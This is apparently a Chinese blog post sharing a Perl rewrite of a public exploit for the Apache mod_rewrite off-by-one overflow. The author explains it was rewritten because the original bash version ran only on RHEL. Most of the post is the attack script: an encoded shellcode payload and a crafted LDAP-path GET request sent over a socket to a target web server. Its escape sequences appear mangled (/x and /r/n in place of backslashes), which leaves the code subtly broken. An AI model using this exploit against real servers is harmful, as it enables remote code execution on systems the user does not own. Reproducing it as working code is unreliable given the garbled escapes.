重写Apache mod_rewrite off-by-one EXP

刚好最近内网有个B站得测试，去EXPLOIT-DB上Search发现这个，down下来测试后发现跑不起来，结果axis之前的bash脚本他妈的只能在rhel上跑，debian系的Linux跑起来报错，

.

刚好最近内网有个B站得测试，去EXPLOIT-DB上Search发现这个，down下来测试后发现跑不起来，结果axis之前的bash脚本他妈的只能在rhel上跑，debian系的Linux跑起来报错，由于木有rhel的环境就找了个牛逼朋友帮忙重写了下。

脚本如下：

 

#!/usr/bin/env perl 
 
use IO::Socket; 
 
$ARGC = @ARGV; 
unless($ARGC == 2){ 
    print "Apache mod_rewrite off-by-one overflow/n"; 
    print "Usage: $0 webserver port/n"; 
    exit; 
} 
 
$host = $ARGV[0]; 
$port = $ARGV[1]; 
$one = "Sweeper"x5; 
$two = "C"x10; 
$shellcode =  
"/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x49/x49/x49/x49/x49/x49". 
"/x49/x49/x49/x49/x49/x49/x49/x49/x49/x37/x49/x49/x51/x5a/x6a/x63". 
"/x58/x30/x42/x30/x50/x42/x6b/x42/x41/x73/x42/x32/x42/x41/x41/x32". 
"/x41/x41/x30/x41/x41/x58/x50/x38/x42/x42/x75/x69/x79/x79/x6c/x51". 
"/x7a/x6a/x4b/x50/x4d/x4d/x38/x6b/x49/x79/x6f/x49/x6f/x6b/x4f/x65". 
"/x30/x4c/x4b/x72/x4c/x45/x74/x51/x34/x4e/x6b/x71/x55/x77/x4c/x6c". 
"/x4b/x33/x4c/x64/x45/x33/x48/x64/x41/x5a/x4f/x4c/x4b/x72/x6f/x36". 
"/x78/x4c/x4b/x73/x6f/x45/x70/x66/x61/x4a/x4b/x53/x79/x4e/x6b/x44". 
"/x74/x4e/x6b/x73/x31/x38/x6e/x55/x61/x79/x50/x6c/x59/x6c/x6c/x4b". 
"/x34/x6f/x30/x74/x34/x34/x47/x59/x51/x5a/x6a/x76/x6d/x76/x61/x6f". 
"/x32/x5a/x4b/x79/x64/x55/x6b/x33/x64/x51/x34/x41/x38/x30/x75/x4b". 
"/x55/x6e/x6b/x33/x6f/x44/x64/x46/x61/x7a/x4b/x32/x46/x6e/x6b/x34". 
"/x4c/x42/x6b/x6e/x6b/x73/x6f/x77/x6c/x54/x41/x58/x6b/x43/x33/x74". 
"/x6c/x6c/x4b/x4d/x59/x50/x6c/x74/x64/x75/x4c/x52/x41/x6f/x33/x50". 
"/x31/x6b/x6b/x72/x44/x4c/x4b/x50/x43/x66/x50/x6c/x4b/x33/x70/x64". 
"/x4c/x6c/x4b/x74/x30/x65/x4c/x4e/x4d/x4e/x6b/x53/x70/x47/x78/x33". 
"/x6e/x51/x78/x4c/x4e/x52/x6e/x56/x6e/x58/x6c/x50/x50/x59/x6f/x79". 
"/x46/x70/x66/x62/x73/x75/x36/x75/x38/x66/x53/x64/x72/x42/x48/x53". 
"/x47/x32/x53/x50/x32/x71/x4f/x71/x44/x49/x6f/x48/x50/x52/x48/x5a". 
"/x6b/x48/x6d/x6b/x4c/x65/x6b/x70/x50/x4b/x4f/x68/x56/x61/x4f/x4e". 
"/x69/x4a/x45/x30/x66/x6e/x61/x78/x6d/x67/x78/x73/x32/x42/x75/x52". 
"/x4a/x75/x52/x6b/x4f/x7a/x70/x61/x78/x6b/x69/x55/x59/x6c/x35/x6e". 
"/x4d/x51/x47/x4b/x4f/x4e/x36/x70/x53/x50/x53/x56/x33/x76/x33/x43". 
"/x73/x32/x73/x31/x53/x52/x73/x6b/x4f/x4a/x70/x70/x68/x6f/x30/x6d". 
"/x78/x35/x50/x46/x61/x30/x66/x30/x68/x76/x64/x6c/x42/x33/x56/x70". 
"/x53/x4e/x69/x78/x61/x4c/x55/x75/x38/x4a/x4c/x58/x79/x4c/x6a/x73". 
"/x50/x53/x67/x6b/x4f/x6a/x76/x73/x5a/x72/x30/x73/x61/x53/x65/x4b". 
"/x4f/x6a/x70/x52/x46/x31/x7a/x52/x44/x73/x56/x50/x68/x51/x73/x50". 
"/x6d/x32/x4a/x62/x70/x51/x49/x47/x59/x6a/x6c/x6c/x49/x4b/x57/x42". 
"/x4a/x73/x74/x6d/x59/x6d/x32/x35/x61/x6f/x30/x48/x73/x4f/x5a/x6f". 
"/x65/x4c/x49/x39/x6d/x4b/x4e/x33/x72/x54/x6d/x6b/x4e/x33/x72/x34". 
"/x6c/x6c/x4d/x50/x7a/x57/x48/x4e/x4b/x4c/x6b/x6c/x6b/x71/x78/x32". 
"/x52/x6b/x4e/x6c/x73/x42/x36/x49/x6f/x73/x45/x65/x78/x6b/x4f/x6e". 
"/x36/x71/x4b/x42/x77/x43/x62/x53/x61/x76/x31/x70/x51/x30/x6a/x35". 
"/x51/x62/x71/x76/x31/x72/x75/x43/x61/x4b/x4f/x6e/x30/x73/x58/x4e". 
"/x4d/x7a/x79/x37/x75/x38/x4e/x31/x43/x4b/x4f/x4a/x76/x30/x6a/x39". 
"/x6f/x6b/x4f/x70/x37/x6b/x4f/x6e/x30/x45/x38/x39/x77/x54/x39/x79". 
"/x56/x71/x69/x79/x6f/x53/x45/x56/x64/x69/x6f/x69/x46/x6b/x4f/x62". 
"/x57/x6b/x4c/x4b/x4f/x6a/x70/x50/x68/x6a/x50/x6f/x7a/x37/x74/x43". 
"/x6f/x72/x73/x4b/x4f/x6a/x76/x79/x6f/x38/x50/x63"; 
 
$exploit = "GET //1//ldap:////Exploit//$one%3fA%3fA%3f$two%3fC%3f%90$shellcode HTTP//1.1/r/nHost: $host/r/n/r/n"; 
print $exploit; 
$socket = IO::Socket::INET->new( 
            PeerAddr => $host,  
            PeerPort => $port,  
            Type     => SOCK_STREAM 
            ); 
if(defined($socket)){ 
    print "sending exploit codz .../n"; 
    print $socket $exploit; 
}else{ 
 die("cant create socket connention!"); 
} 
 $response = <$socket>;  
 close $socket; 
 print $response;  

 

.